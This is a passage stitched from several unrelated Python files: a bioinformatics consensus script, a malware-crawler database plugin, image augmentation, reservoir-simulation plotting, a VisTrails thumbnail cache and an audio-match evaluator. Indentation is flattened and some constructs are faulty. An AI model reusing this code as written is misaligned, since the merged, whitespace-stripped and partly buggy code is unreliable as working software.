ham(s1, s2): """Return the Hamming distance between equal-length sequences""" if len(s1) != len(s2): raise ValueError("Undefined for sequences of unequal length") mm=0 sup=0 for el1, el2 in zip(s1, s2): if el1=='-' and el2=='-': continue sup +=1 if el1 != el2: mm +=1 return mm*1.0/sup def get_consensus(matrix): output = '' for i in range(matrix.shape[1]): site = collections.Counter(matrix[:, i]).most_common(1)[0][0] output += site return output if __name__ == "__main__": parser = OptionParser() parser.add_option("-i", "--input", dest="input_fp", help="path to the input OTU table in gg format", metavar="FILE") parser.add_option("-a", "--alignment", dest="alignment_fp", help="path to the input gg alignment file", metavar="FILE") parser.add_option("-l", "--log", dest="log_fp", help="path to log file", metavar="FILE") # parser.add_option("-o", "--output", dest="output_fp", # help="path to the output greengenes otu table file", metavar="FILE") (options, args) = parser.parse_args() input_fp = options.input_fp alignment_fp = options.alignment_fp log_fp = options.log_fp #print("Reading input") fin = open(input_fp, "r") otus = map(lambda x: x.strip().split('\t')[1:], fin.readlines()) fin.close() alignment = AlignIO.read(open(alignment_fp), 'fasta') mp = dict([(record.id, record.seq.__str__()) for record in alignment]) flog = open(log_fp, "w") ind = 0 weights = 0 for otu in otus: if len(otu) > 1: otu_seqs = [] for sq in otu: otu_seqs.append(mp[sq]) k = numpy.array(list(map(lambda x: list(x), otu_seqs))) consensus = get_consensus(k) dm = numpy.zeros(len(otu)) for i in range(len(otu)): dm[i] = ham(mp[otu[i]], consensus) sum = numpy.sum(dm) flog.write(str(len(dm)) + '\t' + str(sum) + '\n') sum = sum * 1.0 / len(dm) ind += sum weights += 1 #print(ind * 1.0 / weights) ind = ind * 1.0 / weights print(ind) flog.close() rtb7rd/cs3240-labdemo __author__ = 'Student' import helper helper.greeting("hello") K4lium/Snakepit # Copyright (C) 2013-2015 Ragpicker Developers. # This file is part of Ragpicker Malware Crawler - http://code.google.com/p/malware-crawler/ import logging from yapsy.IPlugin import IPlugin from core.database import Database from core.abstracts import Report log = logging.getLogger("MongoDB") class MongoDB(IPlugin, Report): """Stores report in MongoDB.""" def run(self, results, objfile): """Writes report. @param results: analysis results dictionary. @param objfile: file object """ database = Database() # Count query using URL hash and file hash count = database.countRagpickerDB(results["Info"]["file"]["md5"], results["Info"]["url"]["md5"]) # If report available for the file and url -> not insert if count == 0: # Create a copy of the dictionary. This is done in order to not modify # the original dictionary and possibly compromise the following # reporting modules. report = dict(results) # Store the report database.insertRagpickerDB(report) count = database.countFamilyDB(objfile.family.parentObjectSHA256) if count == 0: if objfile.family.unpackedObjectSHA256 != "" or len(objfile.family.siblingObjectsSHA256) > 0: log.info(objfile.family) report = dict(objfile.family.__dict__) database.insertFamily(report) def deleteAll(self): """Deletes all reports. """ # Alle Ragpicker-Daten aus der MongoDB loeschen count = Database().deleteRagpickerDB() print "*** MongoDB (Ragpicker)***" print "deleted documents:" + str(count) print "" count = Database().deleteFamilyDB() print "*** MongoDB (Family)***" print "deleted documents:" + str(count) print "" count = Database().deleteSandboxTaskQueueDB() print "*** MongoDB (SandboxTaskQueue)***" print "deleted documents:" + str(count) print "" mesarcik/NLN import tensorflow as tf import numpy as np import copy from .patches import get_patches #TODO this certainly is not the most efficient, pythonic, nor tensorflowic way of doing things def random_rotation(images, masks = None): """ Applies random discrete rotation based augmentations to the test data and to their masks (if applicable) The discrete rotations are [0,90,180,270,360] degrees Parameters ---------- images (np.array) mask_images (optional, np.array) Returns ------- np.array, (optional) np.array """ r_images = copy.deepcopy(images) if masks is not None: masks = np.expand_dims(masks,axis=-1) r_masks = copy.deepcopy(masks) for i in range(images.shape[0]): k = np.random.randint(0,5) rot_cond = tf.less(tf.random.uniform([], 0, 1.0), .5) r_images[i,...] = tf.cond(rot_cond, lambda: tf.image.rot90(images[i,...],k), lambda: images[i,...]) if masks is not None: r_masks[i,...] = tf.cond(rot_cond, lambda: tf.image.rot90(masks[i,...],k), lambda: masks [i,...]) if masks is not None: return np.concatenate([images,r_images],axis=0), np.concatenate([masks,r_masks],axis=0)[...,0] else: return np.concatenate([images,r_images],axis=0) def random_crop(images, crop_size): """ Applies central crop and then random crop based augmentations to the test data and to their masks (if applicable) Parameters ---------- images (np.array) crop_size (list-like) Returns ------- np.array Raises: ------- ValueError: If the shape of `image` is incompatible with the `masks` """ assert(images.shape[1] *0.9 > crop_size[0], ValueError, 'X dimension of crop must be greater than X of crop') assert(images.shape[2]*0.9 > crop_size[1], ValueError, 'Y dimension of crop must be greater than Y of crop') images = tf.image.central_crop(images ,0.8).numpy() images_,_ = get_patches(images, np.zeros(len(images)), (1, int(1.7*crop_size[0]), int(1.7*crop_size[1]), 1), (1, int(1.7*crop_size[0]), int(1.7*crop_size[1]), 1), (1,1,1,1), 'VALID') r_images = np.empty([images_.shape[0], crop_size[0], crop_size[1], images_.shape[-1]]) for i in range(images_.shape[0]): x_offset = np.random.randint(0, images_.shape[1] - crop_size[0] + 1) y_offset = np.random.randint(0, images_.shape[2] - crop_size[1] + 1) r_images[i,...] = tf.image.crop_to_bounding_box(images_[i,...], x_offset, y_offset, crop_size[0], crop_size[1]) return r_images.astype('uint8') LukasMosser/DeepFlow import numpy as np from mpl_toolkits.axes_grid1 import make_axes_locatable import matplotlib.pyplot as plt import xarray as xr import pandas as pd import numpy as np import scipy.io as io import os import scipy.stats from skimage import measure from skimage.morphology import binary_dilation from scipy import stats from tqdm import tqdm as tqdm import matplotlib import matplotlib.colors as colors import matplotlib.cm as cmx def update_matplotlib_config(): # inspired by http://nipunbatra.github.io/2014/08/latexify/ params = { 'text.latex.preamble': ['\\usepackage{gensymb}'], 'image.origin': 'lower', 'image.interpolation': 'nearest', 'image.cmap': 'gray', 'axes.grid': False, 'savefig.dpi': 150, # to adjust notebook inline plot size 'axes.labelsize': 8, # fontsize for x and y labels (was 10) 'axes.titlesize': 8, 'font.size': 8, # was 10 'legend.fontsize': 10, # was 10 'xtick.labelsize': 14, 'ytick.labelsize': 14, 'text.usetex': True, 'figure.figsize': [14, 12], 'font.family': 'serif', } matplotlib.rcParams.update(params) return True def load_gt_model_from_numpy(file): gt = np.load(file) return gt[0, :, ::-1].T def get_reference_curves(working_dir, perm, case='/reference/reference_noise.nc'): ds_ref = xr.open_dataset(working_dir+perm+case) qor_ref = ds_ref['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24) qwr_ref = ds_ref['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24) p_ref = ds_ref['state_variables'][dict(state_variable=0, well=0)]/1e5 return [qor_ref, qwr_ref, p_ref] def extract_curves(folder, N=500): qor_curves = [] qwr_curves = [] p_curves = [] perms, poros = [], [] material_grads = [] for i in tqdm(range(0, N)): try: ds = xr.open_dataset(folder+'/iteration_'+str(i)+'.nc') qor_curves.append(ds['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24)) qwr_curves.append(ds['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24)) p_curves.append(ds['state_variables'][dict(state_variable=0, well=0)]/1e5) perms.append(ds['material_properties'][1].values) poros.append(ds['material_properties'][0].values) material_grads.append(ds['material_derivatives'].values) ds.close() except FileNotFoundError or KeyError: pass return np.array(qor_curves), np.array(qwr_curves), np.array(p_curves), np.array(perms), np.array(material_grads), np.array(poros) def inverse_permeability_transform(x, a=0.001, b=1e-12): return x/b-a def plot_colored_rate_curves(axarr, min_curves, iterations_to_show, ref_curves, dts, method="-Adam", color="blue", alpha=0.1, ref_color="red", cmap="coolwarm"): selected_curves = min_curves[iterations_to_show] jet = cm = plt.get_cmap(cmap) log_total = iterations_to_show cNorm = colors.Normalize(vmin=np.min(log_total), vmax=np.max(log_total)) scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet) cs = [scalarMap.to_rgba(j) for j in log_total] for j, (curves, idx) in enumerate(zip(selected_curves, iterations_to_show)): if j == len(selected_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5, label="Simulated") else: for k in range(3): cbar_handle = axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5) for k in range(3): axarr[k].plot(dts, selected_curves[0][k], color='black', linewidth=2, linestyle="-.", alpha=1.0, label="Initial") for k in range(3): axarr[k].plot(dts, min_curves[iterations_to_show[-1]][k], color='black', alpha=1.0, linewidth=4, linestyle="--", label=r"Minimum $\mathcal{L}(\mathbf{z})$") for i, t, loc in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [0, 1, 1]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, marker="x", s=100, label="Observed", zorder=100) axarr[i].set_ylabel(t, fontsize=16) axarr[i].legend(fontsize=20, loc=loc) for a in axarr: a.set_xlabel("Time [days]", fontsize=16) axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 100000) scalarMap._A = [] plt.colorbar(scalarMap) for a, label, left, up in zip(axarr.flatten(), ["a)", "b)", "c)"], [-30]*3, [330, 330, 1.15e5]*3): a.text(left, up, label, fontsize=22) axarr[2].text(800, 2e4, r"Optimization Iteration", rotation=90, fontsize=24) return True def plot_colored_rate_curves_loss(axarr, min_curves, losses, iterations_to_show, min_iteration, ref_curves, dts, method="-Adam", color="blue", alpha=0.1, ref_color="red", cmap="coolwarm"): selected_curves = min_curves[iterations_to_show] losses = np.log10(losses[iterations_to_show]) jet = cm = plt.get_cmap(cmap) log_total = losses cNorm = colors.Normalize(vmin=np.min(log_total), vmax=np.max(log_total)) scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=jet) cs = [scalarMap.to_rgba(j) for j in log_total] for j, (curves, idx) in enumerate(zip(selected_curves, iterations_to_show)): if j == len(selected_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5, label="Simulated") else: for k in range(3): cbar_handle = axarr[k].plot(dts, curves[k], color=cs[j], alpha=0.5) for k in range(3): axarr[k].plot(dts, selected_curves[0][k], color='green', linewidth=4, linestyle="-.", alpha=1.0, label="Initial") for k in range(3): axarr[k].plot(dts, min_curves[min_iteration, k, :][0], color='black', alpha=1.0, linewidth=4, linestyle="--", label=r"Minimum $\mathcal{L}(\mathbf{z})$") for i, t, loc in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [0, 1, 1]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, marker="x", s=60, label="Observed", zorder=100) axarr[i].set_ylabel(t, fontsize=16) axarr[i].legend(fontsize=20, loc=loc) for a in axarr: a.set_xlabel("Time [days]", fontsize=16) axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 100000) scalarMap._A = [] plt.colorbar(scalarMap) for a, label, left, up in zip(axarr.flatten(), ["a)", "b)", "c)"], [-30]*3, [330, 330, 1.15e5]*3): a.text(left, up, label, fontsize=22) axarr[2].text(800, 2e4, r"Total Loss $\log[\mathcal{L}(\mathbf{z})]$", rotation=90, fontsize=24) return True def plot_rate_curves(axarr, min_curves, ref_curves, dts, method="-Adam", color="blue", alpha=0.05, ref_color="red"): for j, curves in enumerate(min_curves): if j == len(min_curves)-1: for k in range(3): axarr[k].plot(dts, curves[k], color=color, alpha=alpha, label="Simulated") else: for k in range(3): axarr[k].plot(dts, curves[k], color=color, alpha=alpha) for i in range(3): axarr[i].plot(dts, np.mean(min_curves[:, i], axis=0), linewidth=2, linestyle="-.", color="green", label="Mean") for a in axarr: a.set_xlabel("Time [days]") axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 20000) for i, t, s in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [8, 8, 20]): axarr[i].scatter(dts, ref_curves[i], color=ref_color, label="Observed", marker="x", s=s, alpha=1.0) axarr[i].set_ylabel(t) axarr[i].legend() def plot_rate_bounds(axarr, min_curves, ref_curves, dts, method="-Adam"): mean_curves, lower, upper = mean_confidence_interval(min_curves) for i, t, s in zip(range(3), ["Water Rate [m3/d]", "Oil Rate [m3/d]", "Pressure [Bar]"], [8, 8, 20]): axarr[i].plot(dts, mean_curves[i], color="black", linestyle="-", label="Avg. Simulated") axarr[i].plot(dts, upper[i], color="black", linestyle="--") axarr[i].plot(dts, lower[i], color="black", linestyle="--") axarr[i].fill_between(dts, lower[i], upper[i], color="gray", alpha=0.5, label=r"Mean $\pm 95\%$ conf.") axarr[i].scatter(dts, ref_curves[i], color="red", marker="x", label="Observed", s=s) axarr[i].set_ylabel(t) axarr[i].legend() for a in axarr: a.set_xlabel("Time [days]") axarr[0].set_ylim(-5, 325) axarr[1].set_ylim(-5, 325) axarr[2].set_yscale("log") axarr[2].set_ylim(150, 20000) def plot_facies(axarr, min_poroperms, envelope=None): x = np.where(min_poroperms[:, 1]>1e-13, 1, 0) mean = x.mean(axis=0)[::-1] std = x.std(axis=0)[::-1] sx1 = axarr[0].imshow(mean, vmin=0, vmax=1) axarr[0].set_xticks([]) axarr[0].set_yticks([]) axarr[0].set_ylabel("Mean", fontsize=12) colorbar(sx1) sx2 = axarr[1].imshow(std, vmin=0, vmax=0.5) axarr[1].set_xticks([]) axarr[1].set_yticks([]) axarr[1].set_ylabel("Std. Dev.", fontsize=12) colorbar(sx2) if envelope is not None: axarr[0].contour(envelope, colors="r", linewidths=(0.2, ), alpha=0.5) axarr[1].contour(envelope, colors="r", linewidths=(0.2, ), alpha=0.5) def plot_row_envelopes(i, properties, curves, ref_curves, dts, envelope=None, desc=""): ax1 = plt.subplot2grid((8, 4*2), (i, 0), rowspan=1, colspan=2) ax2 = plt.subplot2grid((8, 4*2), (i+1, 0), rowspan=1, colspan=2) ax2.annotate(desc, xy=(0, 0.0), xytext=(-0.25, 1.5), textcoords='axes fraction', rotation=90, fontsize=14) plot_facies([ax1, ax2], properties, envelope) ax3 = plt.subplot2grid((8, 4*2), (i, 2), rowspan=2, colspan=2) ax4 = plt.subplot2grid((8, 4*2), (i, 4), rowspan=2, colspan=2) ax5 = plt.subplot2grid((8, 4*2), (i, 6), rowspan=2, colspan=2) plot_rate_bounds([ax3, ax4, ax5], curves, ref_curves, dts) def plot_row_curves(i, properties, curves, ref_curves, dts, envelope=None, desc=""): ax1 = plt.subplot2grid((8, 4*2), (i, 0), rowspan=1, colspan=2) ax2 = plt.subplot2grid((8, 4*2), (i+1, 0), rowspan=1, colspan=2) ax2.annotate(desc, xy=(0, 0.0), xytext=(-0.25, 1.5), textcoords='axes fraction', rotation=90, fontsize=14) plot_facies([ax1, ax2], properties, envelope) ax3 = plt.subplot2grid((8, 4*2), (i, 2), rowspan=2, colspan=2) ax4 = plt.subplot2grid((8, 4*2), (i, 4), rowspan=2, colspan=2) ax5 = plt.subplot2grid((8, 4*2), (i, 6), rowspan=2, colspan=2) plot_rate_curves([ax3, ax4, ax5], curves, ref_curves, dts) def to_deltas(dt): dts = [dt[0]] for i in range(1, len(dt)): dts.append(dts[i-1]+dt[i]) return np.array(dts) def create_simulation_time_axis(): dt_1 = to_deltas([1, 1, 3, 5, 5, 10, 10, 10, 15, 15, 15, 15, 15, 15, 15]) dt_2 = 150+to_deltas(np.array([15]*10)) dt_3 = 300+to_deltas([25]*6) dt_4 = 450+to_deltas([25]*6) dts = np.concatenate([dt_1, dt_2, dt_3, dt_4]) return dts def extract_min_misfits(misfits, pos): mins = np.array([(i, np.argmin(x[:, pos], axis=0), x[np.argmin(x[:, pos], axis=0), pos]) for i, x in enumerate(misfits) if len(x) != 0]) return mins def load_folders(working_dir, folders, functionals=["min_f", "min_f", "min_f"]): temp = [] temp_poroperms = [] temp_zs = [] for folder, functional in zip(folders, functionals): min_f_curves = np.load(os.path.join(working_dir, folder, functional+"_curves.npy")) min_f_poroperms = np.load(os.path.join(working_dir, folder, functional+"_poroperms.npy")) min_f_zs = np.load(os.path.join(working_dir, folder, functional+"_zs.npy")) temp.append([min_f_curves]) temp_poroperms.append([min_f_poroperms]) temp_zs.append([min_f_zs]) return temp, temp_poroperms, temp_zs def colorbar(mappable): ax = mappable.axes fig = ax.figure divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) return fig.colorbar(mappable, cax=cax) def get_unconditionals(working_dir, perm, N=1000): curves = [] poros, perms = [], [] zs = [] misfits = [] for i in range(0, N): try: folder = os.path.join(working_dir, perm, 'unconditional_bce/run_'+str(i)) ds = xr.open_dataset(folder+'/iteration_0.nc') qo = ds['state_variables'][dict(state_variable=2, well=1)]*(-60*60*24) qw = ds['state_variables'][dict(state_variable=1, well=1)]*(-60*60*24) p = ds['state_variables'][dict(state_variable=0, well=0)]/1e5 poros.append(ds['material_properties'][0].values) perms.append(ds['material_properties'][1].values) curves.append([qo, qw, p]) zs.append([ds['latent_variables'].values]) misfits.append([ds['misfit_value'].values]) ds.close() except FileNotFoundError: print(i, " not found ") if i % 100 == 99: print(i) return np.array(curves), np.array(poros), np.array(perms), np.array(zs), np.array(misfits) def mean_confidence_interval(data, confidence=0.95): a = 1.0 * np.array(data) n = data.shape[0] m, se = np.mean(a, axis=0), scipy.stats.sem(a, axis=0) h = np.std(a, axis=0) return m, m-h, m+h def determine_connected(facies, dilation=False): if dilation: facies = binary_dilation(facies) connected = measure.label(facies[::-1], background=0) labels = np.unique(connected) for label in labels[1:]: cluster_only = np.where(connected == label, 1, 0) well_a = cluster_only[:, 8:10] well_b = cluster_only[:, 119:121] if np.sum(well_a) > 0 and np.sum(well_b) > 0: return True return False def plot_misfit_histograms(axarr, misfits): t_error = pd.DataFrame([m[:, -1] for m in misfits]) threshs = [] error_threshs = [1e3, 1e2, 1e1, 1e0, 1e0] for t in error_threshs: temp = [] for row in t_error.values: minim = [np.NaN, np.NaN] for i, value in enumerate(row): if value <= t: minim = [i, value] break temp.append(minim) threshs.append(temp) threshs = np.array(threshs) for idx_thresh, ax, e, m in zip(range(0, 3), axarr, [[1, 3], [1, 2], [1, 1]], [100, 100, 500]): non_nan = np.sum(~np.isnan(threshs[idx_thresh, :, 0])) theshs_non_nan = threshs[idx_thresh, :, 0][~np.isnan(threshs[idx_thresh, :, 0])] mode = stats.mode(theshs_non_nan)[0] mean = np.mean(theshs_non_nan) ax.axvline(mean, linestyle="--", color="red", label="Mean: "+str(int(np.ceil(mean)))+" (N="+str(non_nan)+")") ax.hist(theshs_non_nan, histtype="step", color="black", linestyle="-", lw=4, label=r'Histogram $\mathcal{L}(\mathbf{z})='+str(e[0])+r'\times 10^{'+str(e[1])+'}$') ax.legend(fontsize=22, loc=1) ax.set_xlim(0, m) ax.set_ylim(0, 100) ax.set_xlabel("Iterations", fontsize=18) for ax in axarr: handles, labels = ax.get_legend_handles_labels() order = [1,0] ax.legend([handles[idx] for idx in order],[labels[idx] for idx in order], fontsize=20) axarr[0].set_ylabel("Number of Models", fontsize=20) ############################################################################### ## ## Copyright (C) 2011-2014, NYU-Poly. ## Copyright (C) 2006-2011, University of Utah. ## All rights reserved. ## Contact: ## ## This file is part of VisTrails. ## ## "Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## - Redistributions of source code must retain the above copyright notice, ## this list of conditions and the following disclaimer. ## - Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## - Neither the name of the University of Utah nor the names of its ## contributors may be used to endorse or promote products derived from ## this software without specific prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, ## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR ## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR ## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; ## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, ## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ## ############################################################################### import itertools """ Utilities for dealing with the thumbnails """ import os import os.path import shutil import time import uuid import mimetypes # mimetypes are broken by default on windows so use the builtins # Remove line below when it is fixed here: http://bugs.python.org/issue15207 mimetypes.init(files=[]) from vistrails.core import debug from vistrails.core.configuration import get_vistrails_configuration, \ get_vistrails_persistent_configuration from vistrails.core.utils import VistrailsInternalError ############################################################################ class CacheEntry(object): def __init__(self, abs_name, name, time, size): self.abs_name = abs_name self.name = name self.time = time self.size = size class ThumbnailCache(object): _instance = None IMAGE_MAX_WIDTH = 200 SUPPORTED_TYPES = ['image/png','image/jpeg','image/bmp','image/gif'] @staticmethod def getInstance(*args, **kwargs): if ThumbnailCache._instance is None: obj = ThumbnailCache(*args, **kwargs) ThumbnailCache._instance = obj return ThumbnailCache._instance def __init__(self): self.elements = {} self.vtelements = {} self.conf = None conf = get_vistrails_configuration() if conf.has('thumbs'): self.conf = conf.thumbs self.init_cache() def get_directory(self): if self.conf.check('cacheDirectory'): thumbnail_dir = self.conf.cacheDirectory if not os.path.exists(thumbnail_dir): raise VistrailsInternalError("Cannot find %s" % thumbnail_dir) return thumbnail_dir raise VistrailsInternalError("'thumbs.cacheDirectory' not" " specified in configuration") return None def init_cache(self): for root,dirs, files in os.walk(self.get_directory()): for f in files: fname = os.path.join(root,f) statinfo = os.stat(fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(fname, f, time, size) self.elements[f] = entry def get_abs_name_entry(self,name): """get_abs_name_entry(name) -> str It will look for absolute file path of name in self.elements and self.vtelements. It returns None if item was not found. """ try: return self.elements[name].abs_name except KeyError, e: try: return self.vtelements[name].abs_name except KeyError, e: return None def size(self): size = 0 for entry in self.elements.itervalues(): size += entry.size return size def move_cache_directory(self, sourcedir, destdir): """change_cache_directory(sourcedir: str, dest_dir: str) -> None" Moves files from sourcedir to destdir """ if os.path.exists(destdir): for entry in self.elements.itervalues(): try: srcname = entry.abs_name dstname = os.path.join(destdir,entry.name) shutil.move(srcname,dstname) entry.abs_name = dstname except shutil.Error, e: debug.warning("Could not move thumbnail from %s to %s" % ( sourcedir, destdir), e) def remove_lru(self,n=1): elements = self.elements.values() elements.sort(key=lambda obj: obj.time) num = min(n,len(elements)) debug.debug("Will remove %s elements from cache..."%num) debug.debug("Cache has %s elements and %s bytes"%(len(elements), self.size())) for elem in itertools.islice(elements, num): try: del self.elements[elem.name] os.unlink(elem.abs_name) except os.error, e: debug.warning("Could not remove file %s" % elem.abs_name, e) def remove(self,key): if key in self.elements.keys(): entry = self.elements[key] del self.elements[key] os.unlink(entry.abs_name) elif key in self.vtelements.keys(): entry = self.vtelements[key] del self.vtelements[key] os.unlink(entry.abs_name) def clear(self): self.elements = {} self._delete_files(self.get_directory()) def add_entry_from_cell_dump(self, folder, key=None): """create_entry_from_cell_dump(folder: str) -> str Creates a cache entry from images in folder by merge them in a single image and returns the name of the image in cache. If a valid key is provided, it will use it as the name of the image file. """ image = None thumbnail_fnames = self._get_thumbnail_fnames(folder) if len(thumbnail_fnames) > 0: image = self._merge_thumbnails(thumbnail_fnames) fname = None if image != None and image.width() > 0 and image.height() > 0: fname = "%s.png" % str(uuid.uuid1()) abs_fname = self._save_thumbnail(image, fname) statinfo = os.stat(abs_fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(abs_fname, fname, time, size) #remove old element if key: self.remove(key) if self.size() + size > self.conf.cacheSize*1024*1024: self.remove_lru(10) self.elements[fname] = entry return fname def add_entries_from_files(self, absfnames): """add_entries_from_files(absfnames: list of str) -> None In this case the files already exist somewhere on disk. We just keep references to them. """ for abs_fname in absfnames: fname = os.path.basename(abs_fname) statinfo = os.stat(abs_fname) size = int(statinfo[6]) time = float(statinfo[8]) entry = CacheEntry(abs_fname, fname, time, size) self.vtelements[fname] = entry @staticmethod def _delete_files(dirname): """delete_files(dirname: str) -> None Deletes all files inside dirname """ try: for root, dirs, files in os.walk(dirname): for fname in files: os.unlink(os.path.join(root,fname)) except OSError, e: debug.warning("Error when removing thumbnails", e) @staticmethod def _get_thumbnail_fnames(folder): """Returns the filenames of the images to be composited in the given folder. (folder: str) -> list(str) """ fnames = [] for root, dirs, files in os.walk(folder): for f in files: ftype = mimetypes.guess_type(f) if ftype[0] in ThumbnailCache.SUPPORTED_TYPES: fnames.append(os.path.join(root,f)) return fnames @staticmethod def _merge_thumbnails(fnames): """_merge_thumbnails(fnames: list(str)) -> QImage Generates a single image formed by all the images in the fnames list. """ from PyQt4 import QtCore, QtGui height = 0 width = 0 pixmaps = [] # OS may return wrong order so we need to sort fnames.sort() for fname in fnames: pix = QtGui.QPixmap(fname) if pix.height() > 0 and pix.width() > 0: pixmaps.append(pix) #width += pix.width() #height = max(height, pix.height()) height += pix.height() width = max(width,pix.width()) if len(pixmaps) > 0 and height > 0 and width > 0: finalImage = QtGui.QImage(width, height, QtGui.QImage.Format_ARGB32) painter = QtGui.QPainter(finalImage) x = 0 for pix in pixmaps: painter.drawPixmap(0, x, pix) x += pix.height() painter.end() if width > ThumbnailCache.IMAGE_MAX_WIDTH: finalImage = finalImage.scaledToWidth(ThumbnailCache.IMAGE_MAX_WIDTH, QtCore.Qt.SmoothTransformation) else: finalImage = None return finalImage def _save_thumbnail(self, pngimage, fname): """_save_thumbnail(pngimage:QImage, fname: str) -> str Returns the absolute path of the saved image """ png_fname = os.path.join(self.get_directory(), fname) if os.path.exists(png_fname): os.unlink(png_fname) pngimage.save(png_fname) return png_fname def _copy_thumbnails(self, thumbnails): """_copy_thumbnails(thumbnails: list of str) -> None """ local_dir = self.get_directory() for thumb in thumbnails: local_thumb = os.path.join(local_dir, os.path.basename(thumb)) if os.path.exists(thumb) and not os.path.exists(local_thumb): shutil.copyfile(thumb, local_thumb) jean-andre-gauthier/findsong1-10 """ Iterates over match info files produced by get_matches_for_globs.py, and extracts the respective recognition rates """ from argparse import ArgumentParser from os import path import re import subprocess import sys def main(): parser = ArgumentParser() parser.add_argument( "--matchesfilepath", help="matches input file (path)", required=True, type=str) parser.add_argument( "--recognitionrateformatchesfilepath", help="recrate output file (path)", required=True, type=str) parser.add_argument( "--wrongresultsformatchesfilepath", help="wrong matches output file (path)", required=True, type=str) args = parser.parse_args() if not path.exists(args.matchesfilepath): print(f"Error: {args.matchesfilepath} does not exist") sys.exit(1) if path.exists(args.recognitionrateformatchesfilepath): print( f"Error: {args.recognitionrateformatchesfilepath} already exists") sys.exit(1) if path.exists(args.wrongresultsformatchesfilepath): print(f"Error: {args.wrongresultsformatchesfilepath} already exists") sys.exit(1) with open(args.matchesfilepath) as matches_file, open( args.recognitionrateformatchesfilepath, "w") as recrate_for_matches_file, open( args.wrongresultsformatchesfilepath, "w") as wrong_results_for_matches_file: path_regex = (r"workspace/scala/findsong/analyses/data/clips/" + r"audio_filters/(.*)/(.*)") metadata_artist_title_regex = ( r"^format\|tag:artist=(.*)\|" + r"tag:title=(.*)$") metadata_title_artist_regex = ( r"^format\|tag:title=(.*)\|" + "tag:artist=(.*)$") n_matches_by_path_suffix = {} score_by_path_suffix = {} wrong_results_by_path_suffix = {} for match_info in matches_file.readlines(): match_info_list = match_info.split(";") if len(match_info_list) != 11: print(f"Error: unexpected match_info_list {match_info_list}") sys.exit(1) (clip_filename, clip_matcher_duration, clip_score1, _, clip_title_artist1, clip_score2, _, clip_title_artist2, clip_score3, _, clip_title_artist3) = (match_info_list) clip_path_match = re.search(path_regex, clip_filename) path_suffix = clip_path_match.group(1) metadata = subprocess.run( [ "ffprobe", "-show_entries", "format_tags=artist,title", "-of", "compact", clip_filename ], stdout=subprocess.PIPE) decoded_metadata = metadata.stdout.decode("utf-8") metadata_artist_title_match = re.search( metadata_artist_title_regex, decoded_metadata, flags=re.MULTILINE) metadata_title_artist_match = re.search( metadata_title_artist_regex, decoded_metadata, flags=re.MULTILINE) if metadata_artist_title_match or metadata_title_artist_match: (metadata_artist, metadata_title) = (metadata_artist_title_match.group(1), metadata_artist_title_match.group(2) ) if metadata_artist_title_match else ( metadata_title_artist_match.group(2), metadata_title_artist_match.group(1)) if (metadata_title + " - " + metadata_artist == clip_title_artist1): n_matches_by_path_suffix[path_suffix] = ( n_matches_by_path_suffix.get(path_suffix, 0) + 1) score_by_path_suffix[path_suffix] = ( score_by_path_suffix.get(path_suffix, 0) + int(clip_score1)) else: wrong_results_by_path_suffix[path_suffix] = ( wrong_results_by_path_suffix.get(path_suffix, []) + [metadata_title + " - " + metadata_artist]) for (path_suffix, n_matches) in n_matches_by_path_suffix.items(): print( " ".join([ path_suffix, str(n_matches), str(score_by_path_suffix[path_suffix]) ]), file=recrate_for_matches_file) path_suffix_wrong_results_list = [] for (path_suffix, wrong_results) in wrong_results_by_path_suffix.items(): wrong_results.sort() path_suffix_wrong_results_list.append( [path_suffix, ";".join(wrong_results)]) path_suffix_wrong_results_list.sort() for path_suffix_wrong_results in path_suffix_wrong_results_list: print( " ".join(str(entry) for entry in path_suffix_wrong_results), file=wrong_results_for_matches_file) if __name__ == "__main__": main() # System imports import os from os.path import join from git import * from nose.tools import * from PyGitUp.git_wrapper import RebaseError from PyGitUp.tests import basepath, write_file, init_master, update_file, testfile_name test_name = 'rebase_error' repo_path = join(basepath, test_name + os.sep) def setup(): 